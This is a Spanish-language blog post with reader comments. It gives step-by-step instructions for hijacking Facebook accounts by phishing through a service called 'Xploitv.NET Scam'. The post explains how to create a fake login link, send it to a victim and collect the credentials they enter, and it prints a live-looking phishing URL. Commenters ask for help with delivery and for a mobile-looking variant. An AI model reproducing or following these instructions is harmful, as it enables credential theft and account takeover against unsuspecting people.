Cómo hackear Facebook 2021 con Xploitv.NET Scam - Colombia y otros países


 En mayo de 2021 hemos conseguido una herramienta con ello su entendimiento y desarrollo para lograr hackear una cuenta de Facebook a paritr del método de phishing o scam que parte básicamente de un engaño, así que sin más vamos a ver su funcionamiento y como hacer todo paso a paso:

¿Cómo funciona Xploitv.NET Scam?

 

Como dije anteriormente bajo la técnica de Phishing o scam se le envía  un enlace "Falso" a la víctima para que allí inicie sesión y coloque sus datos de acceso finalmente en otro link que tendrás de forma privada serán donde lleguen los datos de la víctima obteniendo el acceso a su cuenta de Facebook.

¿CÓMO HACKEAR FACEBOOK CON XPLOITV.NET SCAM?

1. No hace falta descargar nada simplemente empezamos ingresando al siguiente sitio web:

Clic aquí

2. Una vez dentro de la web tendremos la siguiente interfaz:

Click en la imagen para ampliar


En la primera parte vemos el ID donde puedes colocar la palabra secreta con la que identificarás en el buscador de claves la búsqueda de las claves de las personas a quién le mandaste el link puedes escribir o dejar vacío (El sistema asigna una automática), todo lo demás se explica solo y es opcional llenarlo.

 

3. Luego de llenar el formulario anterior en lo que consideres darás click en "Crear enlace" ahora te abrirá una pestaña de publicidad y deberás dar clic en ella para esperar al menos 10 segundos, y leugo dar clic en el botón verde nuevamente entonces nos mostrará nuestro enlace de la siguiente manera:

Resaltado en amarillo tenemos el link que enviaremos a la victima en mi caso es el siguiente que pegaré y en color rojo encerrado es mi link donde obtendré los datos de la víctima:

http://fawok.es.tl/#b=NWlxanR1dHZ3ZXI%3D&f=facebook&lang=es_LA&e=&u=&time=MTYyMjQwOTAwMA%3D%3D&ip=&lima=regv

Cuando lo abro y pongo unos datos de prueba que serán los siguientes:

Al verificar el link que me dio la web para checar los datos de la víctima deben ser los mismos de la imagen anterior, veamos!!!:

Entonces podemos comprobar que la web está funcionando, por supuesto debemos tener en cuenta que la veracidad de los datos es algo que tú debes comprobar ya que aunque la víctima ponga los datos no garantiza que sean los verdaderos así que deberás ingresar a checar lo más pronto posible.

Y es todo en este post, espero que te sea útil y salvo mi responsabilidad con lo que puedas llegar a hacer con esta información.

 Hasta la próxima,

6 comentarios:

  1. Pregunta bro, el link que verá la víctima se enviara directamente a ella o se lo tengo que enviar manualmente?

    ResponderBorrar
  2. Bro no se pudo probé y nada no me sale los datos

    ResponderBorrar
  3. Porque el link lleva a otra parte que no sea para que la persona ponga sus datos?

    ResponderBorrar
  4. Me funciona pero.....yo quiero uno que parezca como si va a iniciar sesión en un móvil no como PC,alguna otra página que me recomienda?

    ResponderBorrar

ESTAMOS EN: